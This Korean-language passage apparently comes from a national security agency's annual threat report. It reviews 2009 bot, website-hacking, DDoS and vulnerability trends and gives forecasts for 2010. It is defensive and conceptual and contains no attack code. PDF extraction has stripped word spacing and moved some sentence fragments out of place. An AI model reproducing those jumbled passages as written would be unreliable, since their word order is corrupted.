최근국내에서도개방형모바일운영체제를탑재한스마트폰이활성화 됨에따라모바일악성코드의발생가능성이한층증가하고있다. 일례로 아이폰악성코드는 09년 11월한달사이에 3 종류가발생하였다. 모바일악성코드역시 PC환경에서의침해사고와마찬가지로개인정보 - 27 -

유출, 불법스팸발송및메시지전송으로인한금전적인피해를유발시킬수있는만큼이에대한지속적인모니터링이요구된다. 사. 소셜네트워크서비스(SNS) 환경에서의침해사고위협의증가 소셜네트워크서비스는지인또는익명의인터넷이용자간정보를 공유하고지리적인제한을받지않는상태에서의사소통을할수있는 하나의수단으로자리매김하고있다. 비스를제공하는업체에대한 최근이러한소셜네트워크서 DDoS 공격이다수발생하고있는데, 10 년도에도이러한추세는지속될전망이다. 또한, 소셜네트워크서비스 상에서전달되는콘텐츠중에는악성코드가포함될수있으므로서비스 이용자는항상이에대한주의를기울여야한다. - 28 -

제 3 절악성 Bot 동향및전망 1. 개요 진흥원에서는다양한방법으로악성봇에대하여대응을하고있으나, 국내에서발견되는악성봇명령/ 제어서버와감염 PC의수는여전히상 당수에이르고있다. 특히 2008년 11월이후급증한 Conficker 웜은국내 에서도상당히많은 PC 들이감염된것으로확인되었다. 본문서에서는 2009년악성봇의주요동향과더불어2010년에나타날수 있는악성봇동향을예측해보고자한다. 2. 2009 년악성봇동향 가.2009년악성봇대응현황 Conficker 가 2008년말에최초로발견될당시다른봇들과는다르게별 다른움직임이없이주변네트워크로전파되는것이전부였으나그변 형과추가적으로설치되는악성코드들로인하여국내인터넷사용자들 에게도그피해가매우증가하였다. 대응센터에서도 09년 2월싱크홀로 유입되는 IP의수가급증하고있음을포착하고유입IP를분석해본결과 Conficker 에감염된것을확인할수있었다. 이에따라보호나라홈페이지 (www.boho.or.kr ) 를통하여기존의악성봇 감염확인서비스에 Conficker 감염확인서비스 를추가하고, 국내 인터넷사용자가많이사용하는포털과메신저, 그리고게임업체와의 MOU 를통하여악성봇확인서비스를확대함으로국내악성봇치료를 유도하였다. - 29 -

( 그림 2-12) 보호나라에서제공하는 Conficker 확인서비스 대응센터에서운영하는허니넷트래픽을통해추정한 2008년악성봇 국내감염률은평균 8.1% 였으나, 2009년평균감염률은 1.0% 로큰폭으로 감소하였다. 다음표는허니넷에서월별로집계한전세계악성봇감염 대비국내감염비율이다. [ 표 2-10] 악성봇전체감염대비국내비율 구분 국내감염률 1월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월평균 1.4% 2.0% 1.6% 1.0% 1.0% 0.9% 0.9% 0.6% 0.7% 0.6% 0.6% 0.6% 1.0% 2009 년도에는악성도메인을수집하는시스템을추가도입하여보다 다양한방법으로악성도메인을확보하여 DNS 싱크홀에적용할수 있게하였다. 이에따라 2009년도에는총 356,958 개( 누적) 의악성도메인을 싱크홀에적용하여국내악성봇감염에대해대비할수있도록하였다. 나.2009년악성봇동향 대응센터에서운영하는허니넷분석결과 MS Windows 취약점인 MS08-067의영향으로 TCP/445 트래픽의유입이크게증가하였었다. 하지만, 이미국내의많은 ISP에서 TCP/445 트래픽을차단중이어서, 국외 IP로부터의트래픽유입만이크게증가하였고, 이로인하여악성봇 감염률이떨어지는효과가나타났다. 하지만국내의악성봇들도계속 - 30 -

적으로증가하는추세를보이고있으며, 및치료가어렵게진화 발전하고있다. 악성코드의기술이점차로대응 2009 년국내외악성봇의주요동향및특징을살펴보면다음과같다. onetbot을이용한ddos 공격의지속 - 2007 년화상채팅, 아이템거래사이트공격및최근포털업체나청와대 등에대한 DDoS 공격에사용된 DDoS 공격전용툴로중국의 Warning Security Team( 해커) 이제작/ 판매하는공격도구인 NetBot은 2009년도에도계속적으로악용되어금전을요구하는랜 섬형 DDoS 공격이다수발생하였다. - NetBot은자기전파기능이탑재되지않아카페나블로그를통하여 특정프로그램을다운받아설치할경우 하는사례가많았다. Netbot이함께설치되도록 - 2009년에는게임프리서버를중심으로보복성공격이나프리서버의 마스터에게아이템유포를요구하는등의 DDoS 공격을수행해주는 전문카페들이활성화되어네트워크상의트래픽을유발시키는신 고가다수접수되었다. o 네트워크상에서의봇넷탐지회피(Anti-Detection) 기술출현 - 네트워크에서실시간으로악성봇넷을탐지하고차단하는시스템을 회피하여악성행위를하는다양한회피기법이출현하였다. - Fast Flux : 초기악성봇넷이고정된 C&C 서버를두어 C&C 서버만 차단하면악성봇넷이활동하지못하게되는것을회피하기위해 고려된방안으로 DNS의 TTL값을아주짦게주고네임서버의 IP나 웹서버의 IP 를계속바꿔주는방법을이용하였다. - DDNS(Dynamic DNS) : 유동 IP 주소를사용하는시스템의경우에도 DNS 정보를쉽게유지하는방법으로좀비시스템을로드밸런스 서버로사용하기위해 DDNS 를사용하기도하였다. -DomainFlux:Fast-Flux 의단점을해결하기위해고려된것으로 - 31 -

봇에서 DGA(Domain Generation Algorithm) 을이용하여도메인 자체를스스로계산하여산출하는방법이다. 생성하는도메인 리스트는각각의봇에의해독립적으로생성이되며, 일정기간마다 재생성하게되어탐지를어렵게만들었었다. 이는 Kraken/ Bobax와 Srizbi, 그리고 Confiker, Torpig 봇넷등에서사용되었었다. ( 그림 2-13) Torpig 봇넷의네트워크구조 - 이외에도통신상의암호화나주기적인 C&C 변경, 프로토콜의다양화, 노이즈패킷삽입등의다양한기법들을살펴볼수있었다. o 사회공학적인방법을통한봇넷전파 - 시만텍은트위터초대를가장한메일에서대량메일발송웜을발견 했다고전했다. 보여, 이메시지는트위터계정으로부터보내진것처럼 Card.zip라는파일을첨부하여이용자로하여금악성코드 실행을유도하였다. - 마이클잭슨의죽음이후 8시간만에스팸메일및악성코드가 발견되어사용자컴퓨터의제어권을탈취하고추가명령을대기 하게만들었다. o 해외봇넷의동향 - 지난 6월 4일스팸메일에이용된 3FN으로알려진 ISP Pricewert를 폐쇄하여스팸메일의양이 15% 감소하였으며, 이때 Mega-D 봇넷이 - 32 -

C&C 를이전하지못하고더이상의활동을중단하였다. 하지만 Cutwail 봇넷은순식간에봇넷의 1/3까지복구시키면서다시모든 스팸메일의 46% 를발송하고있으며현재 150~200만대의활동중인 좀비PC 를제어하고있는것으로알려지고있다. 국내 ISP 업체에서도지난 6월경 DNS MX 유발시키는스팸봇넷인 Netsky에 의하여최대 6.9 만/PPS 를탐지하였었으며, 당시해당 C&C를차단함으로써 66% 감소시킨사례가있었음 - 마이크로소프트보안소프트웨어(MSE, Microsoft Security Essentials) 를 지난 9월 29 일자로정식으로출시하였으며, 중국정부는그린댐 (Green Dam) 소프트웨어를새로출시되는모든컴퓨터에기본적으로 내장하도록하였으나자체취약점및악용하는사례가빈번함에따라 전면취소하였으며, 미국텍사스주에서는 6월 19일자로스파이웨어 방지개정법안을통과시켰다. - 새로운악성소프트웨어및봇넷전문거래사이트들이구축되면서좀비 PC가댓수로판매가되거나봇넷자체를임대하는사업자까지 출현 하면서이미거대한비즈니스산업으로발전하고있음을시사하였다. 3. 2010 년악성봇전망 최근들어각종언론매체를통해서도알수있듯이개인정보유출사고는 계속증가하고있다. 과거의인터넷사용에있어서의가장큰위협은 봇넷을형성한후대상이되는특정웹사이트의서비스를방해하는 DDoS 공격및다량의스팸메일들이었으나, 사용자 최근에는취약한인터넷 PC 에설치된봇을이용하여주민등록번호및게임계정정보, 신용카드번호등과같은개인정보를유출시키는사례들을많이접할수 있었다. 미국보안업체인트렌드마이크로는 2010 위협보고서에서과거의단순키로깅을벗어나신용카드정보획득및은행계정의접근, 나아가다른 - 33 -

은행계좌로송금하는기능까지가능하리라고예상하고있다. 또한기존의개인정보를탈취하여이를악용하는단계에이르기까지도루트가매우단축되어보다빠르게목적을달성하게될것이라고예상하고있다. 이와더불어기확보한봇들을통하여개인의고유정보와금융정보 등을거래하는이른바 지하시장 이빠르게성장하면서그피해가증가할 것으로보인다. 과거와는달리금전적인이익추구를위하여수행했던 일련의공격들이이제는타인의개인정보를활용하여직접적으로 금융에접근함으로써정보나자금을탈취하는행위들이많아질것으로 예상된다. 이미 2009년 7월에미국에서만 260만대의 PC들을감염시킨 ZeuS 봇은업데이트를통해다양한프로토콜을사용하여사용자의은행 정보뿐만아니라기타금융사이트정보, 정보들을수집하도록하고있는것으로조사되었다. 사용자개인정보및호스트 악성봇에대한탐지와우회기법들에대한기술들도계속적으로진화하여치열한전쟁이될것으로예상된다. 이제는네트워크상의시그니처기반봇넷탐지기술은어느정도한계에부닥치게되고, 클라이언트( 단말기, PC) 단의봇탐지및이상행위탐지와맞물려함께탐지할수있는기술에대한연구에더욱관심을가질필요가있을것이다. 최근에상용툴을이용하여웹사이트를해킹하는사건처럼홈페이지의 위험노출은날이갈수록더욱확대될것으로보이며, 이를통한 Drive-by-download 스크립트를활용하여지속적으로국내봇들도증가할 것으로예상된다. 또한스마트폰이국내에도시판됨에따라 DDoS나 봇넷이일반사용자들이들고다니는핸드폰에서도다양한공격기법이 결합하여급속도로전파될가능성이높아보인다. - 34 -

4. 결론 최근악성코드들은주로금전적인이득을위하여배포되고있고좀비 PC 사용자의개인정보를빠르게확보하여유통시키기위한다양한방식의 진화를거듭해왔다. 악성코드들의전파경로또한과거스캔이나단순 이메일링크클릭등의방법이아닌소셜네트워크서비스를통한전파, 그리고피싱사이트및합법적인기관을가장한접속유도등의방법으로 고도화되고있는실정이다. 사용자개인의보안의식이무엇보다중요해진 시점이라하겠다. 감염된악성코드는시스템깊숙이잠복하여백신으로도 탐지가어려울수있으며그행위에있어서도일반프로세스와의차이점을 보이지않으므로더욱식별하기가어려워지고있다. 이러한진화한해킹을막기위해서는기술적대응뿐만아니라적절한 규제및보안인식이부족한 PC 사용자에대한적절한홍보및교육이 필요하며, 항상사용하는 OS 에맞는최신보안업데이트를유지하고, 백신 방화벽등부가적인보안장비를적극적으로활용할필요가있다. - 35 -

제 4 절홈페이지해킹동향및전망 1. 개요 2009년홈페이지해킹사고는변조가4,320건으로전년대비 96% 증가 한반면, 악성코드은닉은7,352건으로전년대비18% 감소한것으로나타 났다. 주요홈페이지해킹사고는자동화된공격을이용한악성코드대량 삽입사고, 악성코드감염을이용한웹사이트관리자의계정도용사고들 이발생하였다. 이제홈페이지해킹은최종목적이아닌악성코드삽 입, 홈페이지에서관리하는기업의주요정보, 개인정보탈취등을위한경 유지형태로정착이되었다. 또한포인트적립을미끼로설치되는애 드웨어들은포털사이트의배너광고교체, 광고추가등새로운형태의공 격들이등장하고있어금전적인이익이라는궁극적인목적을달성하기위 해해가갈수록공격기술은더욱정교하고집요해지고있다. 이번절에서는 2009 년홈페이지해킹사고의주요이슈및동향을살펴보고, 2010 년도의홈페이지해킹을전망해보도록한다. 2. 2009 년홈페이지해킹사고동향 홈페이지에대한해킹공격의변화추세는다음과같다. 먼저해커집단의실력과시나정치적선전과같은핵티비즘성격의홈페이지변조는꾸준히발생하고있다. 다만이전에는자신이해킹했다는증명을위하여홈페이지를다른모습으로변조하여해킹사실을통해서자신과자신의그룹을광고했다면, 현재는이러한광고대신악성코드를유포하도록페이지를변조한다는것이다. 또한사용자에게악성코드를유포하려면변조사실이드러나지않아야하기때문에홈페이지의외관은전혀변화가없어홈페이지를방문하는사용자들의피해가유발된다. - 36 -

또한악성코드를웹사이트관리자 패스워드를탈취하고, PC 에설치하여관리자의아이디/ 이권한을도용하여홈페이지를변조하는기법이 새롭게등장하였다. 도용된권한을이용, 웹설정파일을수정하여대출 사이트로이동시키는공격도새롭게나타났다. 즉, 공격자들의최종목적이자신들을실력을알리는것에서금전적인 이득을얻는것으로변했으며, 이러한변화는 2005년부터지속적으로 관찰되고있다. 홈페이지해킹을통하여유포되는악성코드의종류도초기에는온라인게임아이템유출을위한트로이전성격에서다른악성코드를다운로드하기위한다운로더, DDoS 공격도구등에서공격자의원격조정이가능한악성봇에이전트등으로변화하고있다. 방화벽과같은기본네트워크보안장비의보급으로인해서인터넷에노출되는서비스가감소하였지만홈페이지서비스는여전히개방되어있어홈페이지의해킹은계속될것이다. 또한이러한홈페이지해킹은기존의방화벽, 침입탐지/ 방지시스템과같은고전적인보안장비로는차단이불가능하며, 웹방화벽과같은신규보안장비를도입해야홈페이지공격에대해서방어가되는실정이다. 그러므로홈페이지해킹은당분간지속적으로증가할것으로예측된다. 가. 홈페이지변조및악성코드은닉사고 최근 4년간의홈페이지건수를나타내는아래표및그래프를보게되면 홈페이지변조사고는 2005년을정점으로 2006년에급격히감소하여 지속적으로발생하고있음을알수있다. - 37 -

( 그림 2-14) 홈페이지변조건수 2005 년도의급격한홈페이지변조사건을야기했던공개용웹게시판 프로그램의취약점은 2009년도에도여전히존재하고있어사용자들의 피해가발생하고있다.2009년도에발생한홈페이지변조사고의대부분을 이러한공개웹게시판이차지하고있다. 이미해당취약점을패치한 프로그램이배포되고있고또한상위버전도존재하는데여전히취약한 버전을운영하여피해를입는다는것은관리자들의보안의식이낮다는 것을보여준다. [ 표 2-11] 2009년홈페이지변조사고현황 구분 1 2 3 4 5 6 7 8 9 10 11 12 2009 총계 피해홈페이지 피해시스템 426 97 90 306 193 386 251 1,020 1,039 147 115 250 4,320 76 57 55 122 99 100 117 126 71 72 68 48 1,011-38 -

7, 8 월에발생한급격한홈페이지변조사고의증가는낮은버전의 무료웹게시판 S/W 를운영하는기관의피해가급증하였기때문이다. 이 당시피해시스템이 197대였지만변조된홈페이지는 2059건을차지하여 2009년홈페이지변조사고의절반을차지하는상황이발생하였다. 다시한번 강조하지만관리자는낮은버전의웹게시판을운영하는경우보안성이 강화된최신버전으로업그레이드함으로써피해를예방해야한다. ( 그림 2-15) 악성코드은닉사고건수 2009년도는작년에비해서악성코드은닉사고가조금감소한것으로나타났다. 유포지사이트가급격히증가한월들은악성코드경유사이트대비유포사이트의증가하고있는데해당원인은하나의경유사이트에다수의유포사이트가포함되기때문이다. - 39 -

[ 표 2-12] 2009년홈페이지악성코드은닉사고현황 기관 1 2 3 4 5 6 7 8 9 10 11 12 2009 년총계 유포지 경유지 91 53 70 104 72 137 196 185 255 298 178 92 1,731 294 354 346 580 201 445 601 621 809 797 348 225 5,621 합계 385 407 416 684 273 582 797 806 1,064 1,095 526 317 7,352 악성코드유포및경유사이트의증가는홈페이지변조가단순변조를 넘어서홈페이지변조를악성코드유포/ 경유사이트로사용하고있음을 보여준다. 악성코드가삽입된기관별분류를살펴보면기업에서사용하는 co.kr,.com 도메인이악성코드유포지/ 경유지로가장많이사용되고있었다. 이는공격자가감염 PC를많이확보하기위하여사용자의접속이많은 기업사이트를주로악성코드유포지/ 경유지사이트로악용하고있는 것으로판단된다. 홈페이지악성코드삽입은 된다. 1차적으로홈페이지를공격한후에시도 즉웹어플리케이션의취약점을이용하여홈페이지를점령한후 해당페이지에악성코드관련코드를삽입하고실제악성코드를서버에 업로드하는것이다. 이를방지하기위해서홈페이지관리자는웹어플리케이션의보안성을 확보하고웹방화벽과같은웹보안전용장비를이용하여공격자의공격에 대비해야할것이다. 진흥원에서는공격자의홈페이지해킹에대응할수 있는웹쉘탐지프로그램휘슬및홈페이지보안강화도구캐슬을 보급하고있으며이러한도구를활용하는경우홈페이지변조및 악성코드은닉사고에보다강력하게대응할수있게된다. - 40 -

나. 자동화도구를이용한악성코드대량삽입수법 2008 년부터발생한 SQL Injection 자동화도구를이용한악성코드 대량삽입 공격은취약한홈페이지를대상으로공격하여데이터베이스에 대량으로악성코드를삽입하는공격이다. SQL Injection 공격은홈페이지와데이터베이스가데이터를주고받을 적절한입력값검증을하지않아공격자가주입한 되면서발생한다. SQL 때 명령어가실행 과거에는이취약점을이용해초기페이지나방문자가 많은페이지를대상으로그페이지파일에악성코드를삽입하였지만, 이공격기법에서는데이터베이스에악성코드를대량으로삽입하였다. 데이터베이스에삽입된악성코드들은사용자들이관련웹사이트에접속할 경우 PC 에서실행되게된다. 만약보안업데이트를하지않은컴퓨터 사용자들은악성코드에감염되어피해를입게된다. 이공격피해를입은많은홈페이지관리자들은데이터베이스에삽입 되어있는모든악성코드를삭제하는데상당한시간을소비해야했다. 이사고를계기로상당한국내웹사이트들이 SQL Injection공격에취약 함이재확인되었으며, 관리자들역시해당내용에대해서적극대처하지 않는것으로나타났다. 진흥원에서는이러한홈페이지취약점에대응하기위해서홈페이지운 영자들을위하여공개웹방화벽, 홈페이지보안강화도구캐슬보급을 수행하였으며, 일반사용자를위해서는 PC자동보안업데이트를보급하여 악성코드감염률을저감하기위해노력하고있다. 다. 웹쉘탐지도구휘슬및홈페이지보안강화도구캐슬보급 진흥원에서는홈페이지해킹예방및대응을위해휘슬과캐슬이라는 도구를개발하여보급하고있다. 웹쉘탐지도구휘슬은웹백도어로 이용되고, 공격자들에의해홈페이지해킹에널리활용되고있는웹쉘을 탐지하는도구이다. 홈페이지접속하듯웹쉘에접속하여언제든지명령어를 - 41 -

수행할수있고, 파일수정, 업로드/ 다운로드등을할수있다. 웹쉘을 통해피해시스템제어를할수있어웹쉘은홈페이지해킹이후에거의 대부분설치되는악성파일이다. 웹쉘은백신에서탐지율이낮고, 또한 웹쉘유형과은닉방법이다양해져일반홈페이지관리자들이탐지하기가 대단히어렵다. 이러한웹쉘을효율적으로탐지하고차단하기위해진 흥원에서는휘슬이라는도구를개발하였고, 현재상당수업체들에보급을한 상태다. 웹쉘을탐지한것만으로도쉽게홈페이지해킹여부를확인할수 있어관리자들이해킹예방과관련한추가적인작업을할수있다. 홈페이지관리자들이해당사이트의취약점공격을효율적으로차단 하도록캐슬이라는도구를개발하였다. 캐슬은홈페이지개발단계에서도 적용할수가있고, 공격차단정책등을캐슬관리페이지를통해쉽게 수정하고, 확인할수가있어사용이무척용이하다. 또한소스레벨에서 적용하여소스를직접수정해야하는경우를대신할수있어일반관리자 들한테널리활용되고있다. 진흥원에서는웹쉘탐지도구로우선악성웹쉘을제거한뒤, 취약성 을보완할수있는캐슬을적용하기를권고하고있다. 3. 2010 년홈페이지해킹전망 가. 홈페이지악성코드삽입공격지속 홈페이지의악성코드삽입의목적은금전적인이익을취하기위함으로 판명된지오래되었다. 즉악성코드를삽입하여사용자의계정정보, 금융 정보, 개인정보를탈취하고이를재판매하여현금을확보하는방식이다. 예전에홈페이지가해킹당하면관리자는자신의홈페이지만을복구하고 이에대한홈페이지의가용성만을염려하였다. 그러나 2~3년전부터 발생하고있는홈페이지해킹사고는홈페이지운영기업의존폐를걱정해야 하는문제로확대되었다. 만일홈페이지에가입된회원들의정보가공격을당해서유출되었다면 - 42 -

홈페이지관리자가고민할것이아니라기업의경영진이고민할문제로 문제의규모가급격히확대된다. 기업의홈페이지에악성코드가삽입되어사용자가피해를보는경우 기업이미지실추, 사용자들의손해배상청구, 악성코드감염으로인한 사용자의피해등많은부작용이발생하게된다. 또한이러한악성코드로 인해서개인정보유출, 스팸발송에이용등의 2 차피해가발생하게된다. 이와같은피해를차단하기위해서관리자들은운영하는홈페이지에대한보안성을강화해야한다. 무엇보다도가장큰해결책은홈페이지를안전하게개발하는것이다. 웹전용보안장비를도입하더라도원천적인해결책은되지않는다. 그러므로홈페이지개발시안전한개발방법론적용, 개발과정에서소스코드검증체계수립, 개발후취약점점검후서비스시행등의절차를적용하는것이바람직하다. 진흥원에서는보호나라를통하여취약점점검서비스를제공하고있다. 나. 개인정보대량보유사이트대상공격증가 국외의해커들은이미한국인의개인정보가현금화하기쉬우며한국 인터넷환경상매우유용한정보임을깨닫고있다. 그러므로개인정보가 대량으로수집되는사이트들이공격대상이되리라생각한다. 이런사이트는 필연적으로회원들의정보가밀집되는사이트, 즉헤드헌팅, 구인/ 구직, 소셜네트워킹서비스사이트, 결혼중개업소등이예로들수있다. 그러 므로이러한사이트에대한해커들의공격이지속적으로발생할것으로 예측된다. - 43 -

제 5 절 DDoS 공격동향및전망 1. 개요 2009년에는 7.7 DDoS 침해사고가발생하여 DDoS 공격이모든국민들의 관심사가되었다. 기존에도 DDoS 공격은빈번히발생하고있었으나, 중 소규모의사이트에주로발생하였는데, 이번에는 DDoS 공격대상사이트가 청와대, 국방부등정부기관과농협, 신한은행등금융권, 주요포탈등 으로접속장애발생시사회적파급효과가큰사이트들이었다. 올한해 국내에서발생한 DDoS 공격의동향을요약하고 2010년도경향을간략히 전망해보았다. 2. 2009년 DDoS 공격동향 정부기관및포털사이트들에대한조직적인공격발생 금품갈취성 DDoS 지속발생 자동화된공격도구일반화 가. 정부기관및포털사이트들에대한조직적인공격발생 7.7 DDoS 공격은 2009년 7월 4일미국주요사이트들을대상으로공격이 시작되어 2009년 7월 7일부터 7월 10 일까지국내 외의주요웹사이트를 대상으로동시다발적인 장애가발생하였다. DDoS 공격이발생하여공격대상홈페이지에접속 국내에서최초공격을받은것은 7월 7일 PM 6시 44 분경으로, 진흥원 대응센터에서 DDoS 대응시스템을통해청와대, 국회등의홈페이지가 DDoS 공격을받고있음을인지하였다. 이후, 정부, 대기업등을주요대 - 44 -

상으로하여 7월 9일 18시까지공격이 3차에걸쳐계속되었으며, 7.7 DDoS 침해사고, 인터넷대란시즌2 등으로불리고있다. 또한 DDoS 공격이후 2009년 7월 10일 0시를기준으로악성코드에 감염된 발생하였다. PC의문서파일파괴및부팅에러를일으켜전국적인 이용자피해가 금번 7.7 DDoS 공격은지능적이며치밀하게계획된공격방법으로 서버에는접속장애가초래되었으며, 치료되지않은일부좀비 PC에는 주요문서와부팅시스템손상이발생하였다. 또한, 지금까지금품요구를 목적으로발생한것과는다르게사회적공공재를겨냥한테러의성격을 띄고있었으며, 공격자체를널리알리려는목적이강한것이특징이다. 나. 자동화된공격도구일반화 올해들어중고생들이인터넷카페등을통하여다운로드받은 DDoS 공격툴을이용해 DDoS 공격을하는일이발생하였다. 이들은인터넷에서 'NetBot Attacker' 라불리는DDoS 공격용프로그램을유포하거나, DDoS 공격을직접실행하였다. 이들은인터넷에폭파전문카페를개설하여 운영하고이를통해게임서버에대한 DDoS 공격등을하였다. 이러한폭팸의가입자수는많게는 되고있다. NetBot Attacker 등의 2천2백명에이르는등사회적문제가 DDoS 공격용프로그램은네이버와다음, 구글등의사이트에서간단한검색만으로찾을수있으며국내파일공유 프로그램에서도내려받기가가능할만큼손쉽게구할수있어청소년들이 이같은프로그램을각종게시판이나블로그등에서서로주고받는등 아무런죄의식없이유통시키고있어잠재적폐해가심각하다. - 45 -

3. 2010년도 DDoS 공격전망 가. 스마트폰을이용한 DDoS 발생 2010년에는금품갈취성 DDoS 공격외에도스마트폰을이용한 DDoS 공격이발생할것으로보인다. 이제스마트폰이상당수출시되어 많은사용자가사용하고있으며, 손쉬워악성코드감염시 이러한스마트폰에서 이러한스마트폰은인터넷접속이 DDoS 공격이발생할가능성도있다. DDoS 공격발생시사용한트래픽량만큼 과금 되는스마트폰의특성상개개인에게직접적인금전적피해가야기될수있어 주의가필요하다. 나.DDoS 대응패러다임의변화 2003년 1.25 인터넷침해사고당시보다인터넷및전자상거래사용이 폭증하면서신규악성코드또한급격히증가하고있어사이버공격의 위험수준이높아지고있다. IPTV, 모바일인터넷, 인터넷전화등새로운 인터넷서비스의활성화로사이버공격의대상이증가되고있으며이에 따라정보보호대상도확대되고있다. 이러한환경변화와함께사이버공격의성격도변화하고있다. 과거 주요사이버위협유형이해킹, 인터넷웜, DoS 공격, 이메일스팸등이었다면 2005년이후부터는봇넷과 DDoS 공격, 휴대폰스팸등이최대위협이되고 있다. 공격의목적도과거에는호기심, 자기과시, 서비스가용성침해등이 었다면최근에는데이터탈취를통한금전적이득, 불법유해정보유포, 저작권침해등과같이영리를목적으로하는공격이증가되고있는추세 이다. 특히 7.7 DDoS 공격의경우와같이사전에치밀하게기획되고사회적 공공재를겨냥한테러의목적을가지면서웜, 바이러스, 해킹등이동시에 발생하도록하는복합화지능화된공격이증가하고있다. 이러한사이버공격유형에따라대응패러다임도변화될필요가있다. - 46 -

DDoS 공격의특징은좀비 PC 등을통한과도한접속으로네트워크자원을 소모시켜사용자가정상적인서비스의이용을불가능하게한다는점이다. 과거 DDoS 공격의대응방안은네트워크대역폭을늘리거나네트워크 장비의성능을고도화거나 DDoS 공격발생시공격하는 IP를상위네트워크에서 차단시키는등네트워크측면에서의방어기법이대부분이었다. 그러나금번 7.7 DoS 공격에서도나타났듯이공격방법이기존 DDoS 공격과달리명령제어서버가존재하지않고악성코드를업데이트하는 서버만존재하였으며공격방법도명령제어서버를통한실시간공격제어를 통하지않고스케줄링을통한순차적공격을시도하였다. 때문에기존의 네트워크중심의대응아닌사용자중심의대응방법을통해서겨우그 공격을멈출수있었다. 즉감염된 PC를백신으로치료하여악성코드를 제거함으로써 DDoS 공격을멈추게하였다. 다. 진흥원의 DDoS 대응체계개선 2010년에는고가의 DDoS 대응장비구매가어려워자체대응이어려운 영세기업을지원하기위해대응센터에광대역회선,DDoS대응장비및대응 인력을갖춘사이버긴급대피소가구축 운영된다. 진흥원에서는기존 DDoS 상용서비스와의중복최소화를위해대피소이용기업에대한명확한 기준을마련, 서비스를제공할예정이다. 구축되는 DDoS 대피소는대응센터에서설치한 DDoS 대응시스템이 공격트래픽을걸러내고정상적인트래픽만을피해사이트로전달함으로서 DDoS 공격시에도 피해업체사이트의물리적인변경없이대피소에서정 상적으로기존서비스제공이가능하다. - 47 -

( 그림 2-16) DDoS 사이버긴급대피소흐름도 4. 결론 DDoS 공격은 DoS 공격의분산된형태이므로 DoS 공격에기반한다. DoS 공격의시초부터살펴보면악성코드, 바이러스역사와함께발전되어 왔으며, 지속적으로다른형태로변화하고있다. 지금은악성봇이 DDoS 공격을대부분수행하고있으며이악성봇은지속적으로지능화되고 있어탐지와대응이더욱어려워지고있다. 불행하게도앞으로도금품을목적으로하는 DDoS는지속적으로증가할 것으로예상된다. 더불어 DDoS 공격을위한악성코드의성능및유포기법 역시지능화, 고도화될것으로보인다. 이러한위협에근본적으로대응하기위해서는정부나관련기관의노력도 중요하지만, 무엇보다도사용자스스로가악성코드에감염되면자신도 모르게남에게피해를줄수있다는사실을인지하고, 생활화하고, 반드시필요하다. 보안업데이트를 백신프로그램을설치하여주기적으로검사하는등의노력이 - 48 -

제 6 절보안취약점현황 1. 보안취약점현황 2008년까지감소추세를나타내던취약점이 2009년에는소폭상승하는 추세를나타내었다. 보안취약점을발견하는것이이전에는해커의능력을 과시하기위한수단이었던반면최근에는금전적이득또는사회혼란등을 야기하기위한목적의악성코드유포에이용되고있다. 본절에서는 보안취약점의증감추세와공격영향력및대상변화추이분석등을 통해 2009년보안취약점현황을살펴보고 2010년보안취약점동향을 예측해보고자한다. 가. 보안취약점의증감 CVE(Common Vulnerabilities and Exposures) 에 2009년한해동안 등록된취약점은모두 5,734건으로 2008 년(5,632 건) 과비교했을때소폭 상승한것으로나타났다. 2006년이후하락세를나타내던취약점이 2009년을기점으로상승추세를보이고있으며, 취약점공격대상에서도 중요한변화가있는것으로분석되었다. ( 그림 2-17) 취약점증가추이 - 49 -

나. 공격근원지의변화 취약점에대한공격이발생될수있는지점( 공격근원지) 에대한기준은 원격지네트워크(Remote Network), 인접네트워크(Local Network), 로컬 시스템 (Local System) 으로분류할수있으며, 이는취약점에대한공격이 어느위치에존재하면서시스템을영향을가할수있는지에대한척도가 된다.2009년한해 CVE에등록된보안취약점들을공격근원지에따라 분류해본결과원격지네트워크는 5,271건(91.93%) 으로작년의 5,035 건(89.39%) 과비교하여약 2.53% 증가하였다. 특히, 최근 3년 동안로컬네트워크또는로컬시스템을통하여공격할수있는취약점은 상대적으로적게발생한반면, 원격지네트워크를통한공격은대부분을 차지하고있다. 즉, 최근발견된취약점의대부분이해커에의하여원 격지에서충분히피해시스템을공격할수있는고위험취약점이많 음을나타낸다. ( 그림 2-18) 공격근원지추이 - 50 -

다. 취약점공격영향력의변화 CVE에서분류하고있는심각성의기준은총 3단계로 7점에서 10점 사이의취약점은 High 로, 4점에서 6점사이의취약점은 Medium 으로, 0점에서 3점사이의취약점은Low 로구분되어있다. 아래도표에서볼수 있듯이 2007년 48% 를차지하던 High 레벨의취약점은 2008년에는 51% 로증가하였다가, 2009년에는 48% 로감소하였으나, 고위험도취약점이 여전히절반에육박하는높은비중을차지하고있음을확인할수있다. ( 그림 2-19) 취약점공격영향력추이 라. 취약점공격대상의변화 2009년 IBM 보안위협중간보고서("IBM Internet Security Systems X-Force 2009 Mid-Year Trend and Risk Report ) 에따르면2008년을 기점으로브라우저나운영체제의취약점은점차줄어들고있는반면, 전자문서나멀티미디어관련응용프로그램의취약점수는급격히증가하였다. 최근인터넷을통한전자문서교류나멀티미디어콘텐츠사용이급증하면서 해커들이관련응용프로그램들의 있기때문인것으로추정된다. 취약점을주요공략대상으로하고 - 51 -

( 그림 2-20) 취약점공격대상변화추이 특히, 전자문서관련취약점중에서 MS Office 관련취약점은 2009년 들어감소한반면전자문서로대표적으로사용되고있는 Adobe Acrobat 관련 취약점은 2006 년이후계속증가하고있는것으로확인되었다. ( 그림 2-21) 전자문서포맷관련취약점변화추이 - 52 -

2009 년한해동안대응센터홈페이지(www.krcert.or.kr) 에게시된취약점 관련보안공지를분석한결과아래그림과같이, 2008년에비해 2009년 들어 Adobe 사의 Acrobat 및 Flash Player 관련취약점의비중이 50% 에서 83% 로크게증가한것을확인할수있다. ( 그림 2-22) 전자문서및멀티미디어관련취약점비율 전자문서및멀티미디어관련응용프로그램의취약점이크게증가하고 있으나, 전체취약점에서차지하는비율을기준으로했을때여전히, 웹브라우저관련취약점이사용자들에게는가장큰위협이되고있다. 특히, 아래그림에서와같이 ActiveX 관련취약점은 2008년들어감소 추세를나타내고있으나여전히가장큰비중을차지하고있다. 또한 MS 사의제품군에대한보안이점차강화됨에따라인터넷익스플로러(IE) 의 취약점은감소한반면 Firefox에서발견된취약점이 IE 취약점보다많아진 점도주목할필요가있다. Firefox 이용이확대될수록파급력이더확산 될수있기때문이다. - 53 -

